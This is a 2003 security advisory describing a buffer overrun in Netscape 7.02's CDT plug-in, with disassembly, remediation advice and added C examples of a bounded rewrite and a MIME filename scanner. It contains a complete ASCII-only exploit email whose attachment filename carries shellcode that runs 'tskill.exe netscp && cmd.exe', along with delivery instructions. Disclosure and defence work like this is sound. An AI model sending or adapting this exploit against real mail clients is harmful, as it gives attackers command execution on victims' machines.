[REVS] CDT Plug-in Bug and How to Exploit Vulnerabilities Using Only ASCII Character Set
From: SecuriTeam (support_at_securiteam.com)
Date: 07/16/03
To: list@securiteam.com
Date: 16 Jul 2003 11:44:08 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
Beyond Security in Canada
Toronto-based Sunrays Technologies is now Beyond Security's representative in Canada.
We welcome ISPs, system integrators and IT systems resellers
to promote the most advanced vulnerability assessment solutions today.
Contact us at 416-482-0038 or at canadasales@beyondsecurity.com
- - - - - - - - -
CDT Plug-in Bug and How to Exploit Vulnerabilities Using Only ASCII Character Set
------------------------------------------------------------------------
SUMMARY
This whitepaper describes the creation of an exploit for a classic buffer
overrun using only a subset of the ASCII character set.
DETAILS
Bug description:
Netscape 7.02 ships with the Client Detection Tool (CDT) plug-in (npcdt.dll),
which handles the application/x-cdt MIME type. One of the routines in
npcdt.dll suffers from a classic buffer overrun. The overrun occurs when an
overly long string is passed to the vulnerable routine. This string is
essentially the full path to the temporary folder where attachments are saved
when a mail message is viewed. Below is a fragment of the vulnerable routine,
as derived from IDA:
sub_100016FF proc near
var_100 = byte ptr -100h
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 100h
push [ebp+arg_8] // Full path to CDT file in TMP
mov eax, [ebp+arg_0]
push dword ptr [eax+8] // "http://www.mozilla.org"
lea eax, [ebp+var_100]
push offset aFileAvailableF ; "### File available for %s: %s\n"
push eax
call sprintf
add esp, 10h
xor eax, eax
leave
retn 0Ch
sub_100016FF endp
As we can see, 256 bytes are allocated for local variables and the length of
the arguments is not checked.
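To make the defect concrete, here is an added C example; it is not code from the advisory or from npcdt.dll. It renders the routine above in C (sprintf into a 256-byte stack buffer) beside a bounded snprintf version that detects truncation instead of overflowing, and works out the longest path that still fits. The format string and the "http://www.mozilla.org" argument are taken from the disassembly; the function names and the sample paths are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 256                        /* the 100h bytes of locals in sub_100016FF */
#define CDT_URL "http://www.mozilla.org"    /* second %s argument in the disassembly */

/* "Before": a C rendering of the routine in the disassembly. sprintf writes as
   many bytes as the arguments need, so a long path runs past buf into the saved
   EBP and the return address. Shown for contrast only; never call it on
   untrusted input. */
int announce_file_unsafe(const char *url, const char *path) {
    char buf[BUF_SIZE];
    sprintf(buf, "### File available for %s: %s\n", url, path);
    return 0;
}

/* "After": snprintf never writes more than sizeof buf, and its return value is
   the length the full string would have had, so a value >= sizeof buf means the
   message was truncated and the caller must treat that as an error. On success
   the message is copied to out (if given) and its length is returned. */
int announce_file_safe(const char *url, const char *path, char *out, size_t outsz) {
    char buf[BUF_SIZE];
    int n = snprintf(buf, sizeof buf, "### File available for %s: %s\n", url, path);
    if (n < 0 || (size_t)n >= sizeof buf)
        return -1;                          /* would not fit: refuse instead of overflowing */
    if (out && outsz)
        snprintf(out, outsz, "%s", buf);
    return n;
}

/* Longest path that still fits: 256 minus the fixed format text, the URL and
   the terminating NUL. With the URL from the disassembly this comes to 207. */
size_t max_safe_path_len(const char *url) {
    size_t fixed = strlen("### File available for ") + strlen(": ") + strlen("\n");
    size_t used = fixed + strlen(url) + 1;
    return used >= BUF_SIZE ? 0 : BUF_SIZE - used;
}

/* Experiment helper: announce a constructed path of `len` 'A' characters
   (hypothetical input, not a real TEMP path) and report the safe version's result. */
int try_path_of_length(size_t len) {
    char path[1024];
    if (len >= sizeof path) return -1;
    memset(path, 'A', len);
    path[len] = '\0';
    return announce_file_safe(CDT_URL, path, NULL, 0);
}

int main(void) {
    char msg[BUF_SIZE];
    /* Constructed path modelled on the advisory's example, without the payload. */
    const char *path = "C:\\Documents and Settings\\martin\\Local Settings\\Temp\\plugtmp\\x.CDT";
    int n = announce_file_safe(CDT_URL, path, msg, sizeof msg);
    printf("short path: n=%d, message=%s", n, msg);
    printf("max safe path length for %s: %zu\n", CDT_URL, max_safe_path_len(CDT_URL));
    printf("207-char path: %d, 208-char path: %d\n",
           try_path_of_length(207), try_path_of_length(208));
    return 0;
}
```

The point of the return-value check is that truncation is not a safe fallback here either: a silently cut path would later be handed to other code, so the hardened version refuses the whole operation once the formatted line would exceed 255 characters.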
Proof-of-concept exploit:
The main problem is that we cannot fully control the arguments passed to the
function: we control only part of one argument. This argument is the full
path to the Windows temporary folder plus the name of the CDT file that is
created when mail with an attachment of the application/x-cdt MIME type is
viewed by the user. Example of the second argument's value:
C:\Documents and Settings\martin\Local
Settings\Temp\plugtmp\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAtskill.exe netscp && cmd.exe ATX-%UUU-%UUUFVUUhAAAAZ0TX!
hqHyaZ)TXehU%yaZ)TXeh%S%SZf)TXj0TXaPyCSP~~~~w$$AAAAA
AAAAAAAAAAAAAAAWddwAAAAAAAAAAAAPYIIQXIIIIII(DL!x~.CDT
To exploit this bug we need to create a mail message with an attachment of
the application/x-cdt MIME type whose filename contains the exploit code.
The filename, including the extension, cannot exceed 218 characters under
Windows Server 2003 and cannot contain certain special characters such as >,
< and \. In addition, the filename cannot contain non-ASCII characters if the
exploit is to work. Finally, we need to know the length of the path to the
TEMP folder in order to code the exploit. This is equivalent to the length of
the username, because the rest of the path is known for a given operating
system when default settings are used. Also, Martin was unable to find JMP
ESP/CALL ESP opcodes in the loaded Netscape modules at an acceptable address
(acceptable here meaning ASCII, with the restrictions mentioned above), so
the proof-of-concept exploit is bound to the operating system, here Windows
Server 2003 Enterprise Edition English.
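From the defender's side, the constraints just described give a mail gateway or mail-scanning IDS something concrete to key on: an application/x-cdt part whose filename, once header folding is undone, is far longer than any legitimate CDT name or carries shell metacharacters. The following C example is added here and is not part of the advisory or of any Netscape code. The MIME part headers it scans are constructed samples (a long run of 'A's rather than the advisory's payload), the 64-character threshold is an assumed value, and the function names are the author's own.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Assumed threshold: legitimate CDT attachment names are short, while the
   advisory's payload name runs to well over 100 characters. */
#define CDT_NAME_LIMIT 64

enum { CDT_PART = 1, CDT_LONG_NAME = 2, CDT_BAD_CHARS = 4 };

/* Constructed sample part headers (not the advisory's bytes): a folded
   Content-Disposition whose filename is a long run of 'A's plus a '%'. */
static const char SAMPLE_CDT_PART[] =
    "Content-Type: application/x-cdt;\r\n"
    "\tname=\"sample.cdt\"\r\n"
    "Content-Transfer-Encoding: quoted-printable\r\n"
    "Content-Disposition: attachment;\r\n"
    "\tfilename=\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n"
    " AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%UUU.CDT\"\r\n"
    "\r\n";

/* Constructed benign CDT part with a short, plain filename. */
static const char SAMPLE_BENIGN_PART[] =
    "Content-Type: application/x-cdt;\r\n"
    "\tname=\"detect.cdt\"\r\n"
    "Content-Disposition: attachment;\r\n"
    "\tfilename=\"detect.cdt\"\r\n"
    "\r\n";

/* Case-insensitive "does s start with prefix". */
static int ieq_prefix(const char *s, const char *prefix) {
    for (; *prefix; s++, prefix++)
        if (tolower((unsigned char)*s) != tolower((unsigned char)*prefix)) return 0;
    return 1;
}

/* RFC 2822 unfolding: drop a CRLF (or bare LF) that is followed by SP/TAB, so a
   value wrapped across lines (as the advisory's filename is) becomes one line. */
static void unfold_headers(const char *raw, char *out, size_t outsz) {
    size_t n = 0;
    for (const char *p = raw; *p && n + 1 < outsz; p++) {
        if (*p == '\r' && p[1] == '\n' && (p[2] == ' ' || p[2] == '\t')) { p++; continue; }
        if (*p == '\n' && (p[1] == ' ' || p[1] == '\t')) continue;
        out[n++] = *p;
    }
    out[n] = '\0';
}

/* Pointer just past "Name:" on the first line that starts with Name, or NULL. */
static const char *find_header(const char *hdrs, const char *name) {
    size_t nlen = strlen(name);
    for (const char *line = hdrs; *line;) {
        if (ieq_prefix(line, name) && line[nlen] == ':') return line + nlen + 1;
        const char *nl = strchr(line, '\n');
        if (!nl) break;
        line = nl + 1;
    }
    return NULL;
}

/* Copy the value of `param=` (quoted-string or token) from one header line into
   out; returns its length, or -1 if the parameter is absent. */
static int header_param(const char *value, const char *param, char *out, size_t outsz) {
    size_t plen = strlen(param);
    const char *eol = strchr(value, '\n');
    size_t vlen = eol ? (size_t)(eol - value) : strlen(value);
    for (size_t i = 0; i + plen < vlen; i++) {
        int at_boundary = i == 0 || value[i - 1] == ';' || value[i - 1] == ' ' || value[i - 1] == '\t';
        if (!at_boundary || !ieq_prefix(value + i, param) || value[i + plen] != '=') continue;
        const char *v = value + i + plen + 1, *stop;
        if (*v == '"') { v++; stop = strchr(v, '"'); }      /* quoted-string */
        else stop = v + strcspn(v, "; \t\r\n");             /* bare token */
        if (!stop) return -1;
        size_t len = (size_t)(stop - v);
        if (len >= outsz) len = outsz - 1;
        memcpy(out, v, len);
        out[len] = '\0';
        return (int)len;
    }
    return -1;
}

/* Classify one MIME part by its raw headers; returns a bitmask of CDT_* flags. */
int classify_cdt_part(const char *raw_headers) {
    char hdrs[2048], fname[1024];
    int flags = 0;
    unfold_headers(raw_headers, hdrs, sizeof hdrs);
    const char *ct = find_header(hdrs, "Content-Type");
    if (!ct) return 0;
    while (*ct == ' ' || *ct == '\t') ct++;
    if (!ieq_prefix(ct, "application/x-cdt")) return 0;
    char after = ct[strlen("application/x-cdt")];
    if (after && !strchr("; \t\r\n", after)) return 0;     /* e.g. application/x-cdtfoo */
    flags |= CDT_PART;
    const char *cd = find_header(hdrs, "Content-Disposition");
    int len = cd ? header_param(cd, "filename", fname, sizeof fname) : -1;
    if (len < 0) len = header_param(ct, "name", fname, sizeof fname);   /* fall back to name= */
    if (len < 0) return flags;
    if (len > CDT_NAME_LIMIT) flags |= CDT_LONG_NAME;
    for (int i = 0; i < len; i++) {
        unsigned char c = (unsigned char)fname[i];
        if (c < 0x20 || c > 0x7e || strchr("<>:\"/\\|?*&;%", c)) { flags |= CDT_BAD_CHARS; break; }
    }
    return flags;
}

int main(void) {
    printf("payload-style part: flags=%d\n", classify_cdt_part(SAMPLE_CDT_PART));
    printf("benign part:        flags=%d\n", classify_cdt_part(SAMPLE_BENIGN_PART));
    return 0;
}
```

Unfolding first matters: the advisory's own message wraps the filename over two lines, and a scanner that measures only the first physical line would see a name far shorter than the one the mail client reassembles and hands to the plug-in.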
The main idea is to represent the "shellcode" with a subset of ASCII
characters. There are programs that translate ordinary byte code into byte
code consisting only of "ASCII" characters. However, such programs normally
produce code that is significantly larger than the original. For this reason
the proof-of-concept exploit is coded manually.
Here is what it does:
1. Upon exit from the vulnerable routine in the CDT plug-in, the return
address is overwritten with the address of a JMP ESP opcode in shell32.dll.
2. After the JMP ESP we land almost at the end of our code and have about 26
bytes. In this area the exploit only decodes the bytes for a short jump back
of 126 bytes.
3. Now we have more room, about 94 bytes. Here the exploit decodes a CALL
system opcode, where system is the C run-time function that executes OS
commands (implemented in msvcrt.dll).
4. The system function executes the command that is hard-coded into the
exploit: tskill.exe netscp && cmd.exe. Here tskill.exe terminates Netscape to
avoid cleanup code, and cmd.exe launches a command prompt.
This is definitely not the best approach; it would be better to write a
decoder for the ASCII bytes to make the resulting exploit smaller, to make it
less platform dependent, and to make a call to ExitProcess. However, remember
that this is proof-of-concept code. Below is a mail message with the sample
exploit:
From: <attacker@host.com>
To: <victim@host.com>
Subject: CDT bug Exploit
Date: Mon, 14 Jul 2003 06:54:20 +0400
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0011_01C33EA6.3F7AEDE0"
This is a multi-part message in MIME format.
------=_NextPart_000_0011_01C33EA6.3F7AEDE0
Content-Type: text/plain;
charset="koi8-r"
Content-Transfer-Encoding: 7bit
------=_NextPart_000_0011_01C33EA6.3F7AEDE0
Content-Type: application/x-cdt;
name="jmp.cdt"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtskill.exe netscp
&& cmd.exe ATX-%UUU-%UUUFVUUhAAAAZ0TX!
hqHyaZ)TXehU%yaZ)TXeh%S%SZf)TXj0TXaPyCSP~~~~w$$AAAAAAAAAAAAAAAAAAA
AWddwAAAAAAAAAAAAPYIIQXIIIIII(DL!x~.CDT"
TEST MESSAGE ONLY
------=_NextPart_000_0011_01C33EA6.3F7AEDE0--
Because the text above is wrapped, an unwrapped copy is available at:
http://jimmers.russia.webmatrixhosting.net/exploits/CDT.txt
This exploit was tested on Windows Server 2003 Enterprise Edition English
while logged on as a user with a 6-character username running Netscape 7.02.
To send such a message one may use telnet to an SMTP server, because some
mail clients (Outlook Express) change the Content-Type from
application/x-cdt upon sending if the Content-Type was set manually in the
saved message text.
Resolution:
Manually remove the CDT plug-in from the /components directory, or upgrade to
the latest version of the Netscape browser, which has the CDT plug-in removed.
ADDITIONAL INFORMATION
The original whitepaper can be downloaded from:
http://jimmers.russia.webmatrixhosting.net/whitepapers/CDTbug.pdf
The information has been provided by Martin Rakhmanoff
<jimmers@yandex.ru>.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.